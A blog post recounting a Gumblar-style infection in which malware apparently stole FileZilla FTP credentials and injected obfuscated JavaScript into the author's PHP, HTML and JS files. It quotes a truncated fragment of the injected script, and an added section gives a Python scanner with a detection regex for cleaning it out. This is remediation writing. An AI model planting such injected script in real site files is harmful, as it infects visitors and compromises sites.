This story happened when I visited a website, http://pa-malangkab.go.id. When I visited it, nothing happened at first; the weird thing happened the next day.

In the morning, I turned on my notebook and suddenly a message appeared saying "Security Tools" was already installed on my computer. I didn't remember installing that software recently, but I knew it was spyware or malware, so I used Malwarebytes (http://www.malwarebytes.org/mbam.php) to clean my notebook. It worked great, and the malware was successfully cleaned.

By chance I opened my work website, and something bad happened: the website showed nothing. I checked the code and found some JavaScript code injected into my PHP file. Then I wondered where the code came from.

The JavaScript code:

<script>/*LGPL*/ try{ window.onload = function(){var C1nse3sk8o41s = document.createElement('s&c^$#r))i($p@&t^&'.repl

After some investigation, I found that the malware that infected my notebook stole my FTP credentials. I use the FileZilla FTP client for my FTP activity. The FileZilla FTP client stores recent FTP sessions in its "Quick Connect" feature, and the 6 recent FTP sessions there were stolen from my notebook :( After getting information from the web, I learned that FileZilla is targeted by viruses and malware, which like to steal the FTP passwords. So I will not use FileZilla again!!!!

A couple of hours after the malware infection, tons of my website files were infected with the JavaScript code. As a precautionary measure I changed all the FTP passwords listed in "Quick Connect" in FileZilla. Of the 6 websites, I could only save 1; the other 5 websites were injected by the malware :(

The files that were injected with the JavaScript code were (in my case):

  1. index.php
  2. index.html
  3. .js files
  4. file names that contain "home" & "main"

It would be a lot of work to remove the injected code from the files manually, so I decided to look for information on how to remove injected JavaScript code. Finally I found a good man who wrote PHP code to remove the JavaScript code (thanks a lot :) ). You can download the virus/JavaScript removal tool at http://justcoded.com/article/gumblar-family-virus-removal-tool/
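As an added example (not the post's code and not the justcoded.com tool), here is a small Python scanner that looks for the injected marker `<script>/*LGPL*/ try{` across a webroot, flags whether each hit is one of the file kinds listed above, and can strip the block while keeping a .bak copy of the original. It assumes the injected block ends at the next `</script>`; the sample files are constructed.

```python
import os
import re
from pathlib import Path

# Start of the injected block as the post shows it; assumption: it runs to the next </script>.
INJECT_RE = re.compile(r"<script>/\*LGPL\*/\s*try\s*\{.*?</script>", re.DOTALL | re.IGNORECASE)

def is_listed_target(path):
    # File kinds the post says were hit: index.php, index.html, *.js, names containing "home"/"main".
    name = os.path.basename(path).lower()
    if name in ("index.php", "index.html") or name.endswith(".js"):
        return True
    return "home" in name or "main" in name

def clean_text(text):
    # Strip every injected block; returns (cleaned text, number of blocks removed).
    return INJECT_RE.subn("", text)

def scan_files(files):
    # (path, blocks found, on the post's list) for every file carrying the marker, whatever its name.
    report = []
    for path, content in sorted(files.items()):
        _, n = clean_text(content)
        if n:
            report.append((path, n, is_listed_target(path)))
    return report

def scan_webroot(root, dry_run=True):
    # Walk a real tree; with dry_run=False rewrite infected files, keeping a .bak of each original.
    paths = [p for p in Path(root).rglob("*") if p.is_file()]
    files = {str(p): p.read_text(encoding="utf-8", errors="surrogateescape") for p in paths}
    report = scan_files(files)
    if not dry_run:
        for path, _, _ in report:
            os.replace(path, path + ".bak")
            Path(path).write_text(clean_text(files[path])[0], encoding="utf-8", errors="surrogateescape")
    return report

# Constructed sample webroot (not real site content): an infected index.php, a clean
# script, and a file outside the post's list that also carries the marker.
SAMPLE_FILES = {
    "site/index.php": "<?php echo 'hello'; ?>\n<script>/*LGPL*/ try{ window.onload = function(){} }catch(e){}</script>\n",
    "site/js/app.js": "console.log('clean');\n",
    "site/contact.php": "<p>x</p><script>/*LGPL*/ try{ y(); }catch(e){}</script>",
}

if __name__ == "__main__":
    for path, n, listed in scan_files(SAMPLE_FILES):
        print(f"{path}: {n} block(s)" + ("" if listed else " (file not on the post's list)"))
```

Run `scan_webroot("/path/to/webroot")` first as a dry run and review the report before calling it with `dry_run=False`, since any file carrying the marker is rewritten.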

So how does this virus get onto your computer??? Here is my personal analysis:

  1. We visit an infected website that contains some virus JavaScript code.
  2. Automatically it runs the Java runtime, then downloads a PDF file.
  3. The PDF file is a modified PDF file that was injected with some code / virus, and it exploits your Acrobat Reader.
  4. If your antivirus (my last AV was Avast Home Edition) doesn't recognize the PDF file as a virus, you will be infected.

Prevention:

  1. Update your antivirus (I decided to change my antivirus to Avira (http://www.free-av.com/) free edition, and it recognizes the PDF file virus well)
  2. Update your Acrobat Reader to the latest version and disable JavaScript in your Acrobat Reader (Edit – Preferences – JavaScript – uncheck "Acrobat JavaScript")
  3. Do not use FileZilla, unless you can disable the "Quick Connect" feature